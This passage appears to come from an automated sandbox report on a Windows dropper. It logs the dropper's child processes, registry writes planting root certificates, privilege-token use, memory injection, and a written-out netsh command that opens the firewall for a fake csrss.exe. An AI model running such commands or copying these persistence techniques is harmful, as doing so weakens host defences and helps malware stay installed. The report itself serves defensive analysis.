f88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exeschtasks.exeInfo.exe

pid	process
364	pub2.exe
364	pub2.exe
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1832	schtasks.exe
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
876	Info.exe
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420
1420

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1420
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

364 pub2.exe

pid	process
1420

pid	process
460

Suspicious use of AdjustPrivilegeToken 40 IoCs

Processes:

Install.exeSoCleanInst.exemd9_1sjm.exetaskkill.exeInfo.execsrss.exe

description	pid	process
Token: SeCreateTokenPrivilege	964	Install.exe
Token: SeAssignPrimaryTokenPrivilege	964	Install.exe
Token: SeLockMemoryPrivilege	964	Install.exe
Token: SeIncreaseQuotaPrivilege	964	Install.exe
Token: SeMachineAccountPrivilege	964	Install.exe
Token: SeTcbPrivilege	964	Install.exe
Token: SeSecurityPrivilege	964	Install.exe
Token: SeTakeOwnershipPrivilege	964	Install.exe
Token: SeLoadDriverPrivilege	964	Install.exe
Token: SeSystemProfilePrivilege	964	Install.exe
Token: SeSystemtimePrivilege	964	Install.exe
Token: SeProfSingleProcessPrivilege	964	Install.exe
Token: SeIncBasePriorityPrivilege	964	Install.exe
Token: SeCreatePagefilePrivilege	964	Install.exe
Token: SeCreatePermanentPrivilege	964	Install.exe
Token: SeBackupPrivilege	964	Install.exe
Token: SeRestorePrivilege	964	Install.exe
Token: SeShutdownPrivilege	964	Install.exe
Token: SeDebugPrivilege	964	Install.exe
Token: SeAuditPrivilege	964	Install.exe
Token: SeSystemEnvironmentPrivilege	964	Install.exe
Token: SeChangeNotifyPrivilege	964	Install.exe
Token: SeRemoteShutdownPrivilege	964	Install.exe
Token: SeUndockPrivilege	964	Install.exe
Token: SeSyncAgentPrivilege	964	Install.exe
Token: SeEnableDelegationPrivilege	964	Install.exe
Token: SeManageVolumePrivilege	964	Install.exe
Token: SeImpersonatePrivilege	964	Install.exe
Token: SeCreateGlobalPrivilege	964	Install.exe
Token: 31	964	Install.exe
Token: 32	964	Install.exe
Token: 33	964	Install.exe
Token: 34	964	Install.exe
Token: 35	964	Install.exe
Token: SeDebugPrivilege	1464	SoCleanInst.exe
Token: SeManageVolumePrivilege	1152	md9_1sjm.exe
Token: SeDebugPrivilege	904	taskkill.exe
Token: SeDebugPrivilege	876	Info.exe
Token: SeImpersonatePrivilege	876	Info.exe
Token: SeSystemEnvironmentPrivilege	432	csrss.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exeFolder.exerUNdlL32.eXeFiles.exeInstall.execmd.exe

description	pid	process	target process
PID 1936 wrote to memory of 1464	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	SoCleanInst.exe
PID 1936 wrote to memory of 1464	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	SoCleanInst.exe
PID 1936 wrote to memory of 1464	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	SoCleanInst.exe
PID 1936 wrote to memory of 1464	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	SoCleanInst.exe
PID 1936 wrote to memory of 1152	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	md9_1sjm.exe
PID 1936 wrote to memory of 1152	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	md9_1sjm.exe
PID 1936 wrote to memory of 1152	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	md9_1sjm.exe
PID 1936 wrote to memory of 1152	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	md9_1sjm.exe
PID 1936 wrote to memory of 1392	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Folder.exe
PID 1936 wrote to memory of 1392	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Folder.exe
PID 1936 wrote to memory of 1392	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Folder.exe
PID 1936 wrote to memory of 1392	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Folder.exe
PID 1936 wrote to memory of 876	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Info.exe
PID 1936 wrote to memory of 876	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Info.exe
PID 1936 wrote to memory of 876	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Info.exe
PID 1936 wrote to memory of 876	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Info.exe
PID 1936 wrote to memory of 1988	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Updbdate.exe
PID 1936 wrote to memory of 1988	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Updbdate.exe
PID 1936 wrote to memory of 1988	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Updbdate.exe
PID 1936 wrote to memory of 1988	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Updbdate.exe
PID 1936 wrote to memory of 288	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	File.exe
PID 1936 wrote to memory of 288	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	File.exe
PID 1936 wrote to memory of 288	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	File.exe
PID 1936 wrote to memory of 288	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	File.exe
PID 1936 wrote to memory of 288	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	File.exe
PID 1936 wrote to memory of 288	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	File.exe
PID 1936 wrote to memory of 288	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	File.exe
PID 1392 wrote to memory of 1184	1392	Folder.exe	conhost.exe
PID 1392 wrote to memory of 1184	1392	Folder.exe	conhost.exe
PID 1392 wrote to memory of 1184	1392	Folder.exe	conhost.exe
PID 1392 wrote to memory of 1184	1392	Folder.exe	conhost.exe
PID 1936 wrote to memory of 964	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Install.exe
PID 1936 wrote to memory of 964	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Install.exe
PID 1936 wrote to memory of 964	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Install.exe
PID 1936 wrote to memory of 964	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Install.exe
PID 1936 wrote to memory of 964	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Install.exe
PID 1936 wrote to memory of 964	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Install.exe
PID 1936 wrote to memory of 964	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Install.exe
PID 1936 wrote to memory of 364	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	pub2.exe
PID 1936 wrote to memory of 364	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	pub2.exe
PID 1936 wrote to memory of 364	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	pub2.exe
PID 1936 wrote to memory of 364	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	pub2.exe
PID 1936 wrote to memory of 2040	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Files.exe
PID 1936 wrote to memory of 2040	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Files.exe
PID 1936 wrote to memory of 2040	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Files.exe
PID 1936 wrote to memory of 2040	1936	7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe	Files.exe
PID 988 wrote to memory of 1480	988	rUNdlL32.eXe	rundll32.exe
PID 988 wrote to memory of 1480	988	rUNdlL32.eXe	rundll32.exe
PID 988 wrote to memory of 1480	988	rUNdlL32.eXe	rundll32.exe
PID 988 wrote to memory of 1480	988	rUNdlL32.eXe	rundll32.exe
PID 988 wrote to memory of 1480	988	rUNdlL32.eXe	rundll32.exe
PID 988 wrote to memory of 1480	988	rUNdlL32.eXe	rundll32.exe
PID 988 wrote to memory of 1480	988	rUNdlL32.eXe	rundll32.exe
PID 2040 wrote to memory of 1992	2040	Files.exe	jfiag3g_gg.exe
PID 2040 wrote to memory of 1992	2040	Files.exe	jfiag3g_gg.exe
PID 2040 wrote to memory of 1992	2040	Files.exe	jfiag3g_gg.exe
PID 2040 wrote to memory of 1992	2040	Files.exe	jfiag3g_gg.exe
PID 964 wrote to memory of 520	964	Install.exe	cmd.exe
PID 964 wrote to memory of 520	964	Install.exe	cmd.exe
PID 964 wrote to memory of 520	964	Install.exe	cmd.exe
PID 964 wrote to memory of 520	964	Install.exe	cmd.exe
PID 520 wrote to memory of 904	520	cmd.exe	taskkill.exe
PID 520 wrote to memory of 904	520	cmd.exe	taskkill.exe
PID 520 wrote to memory of 904	520	cmd.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe
"C:\Users\Admin\AppData\Local\Temp\7a86f97569212c68036481f142cf1fe0e4ac5f8ca46cbf3ebf067bdaf7c5ab8d.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1936

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1464

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1152

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1392

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
PID:1184

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:876

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1656

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:1824

C:\Windows\system32\netsh.exe
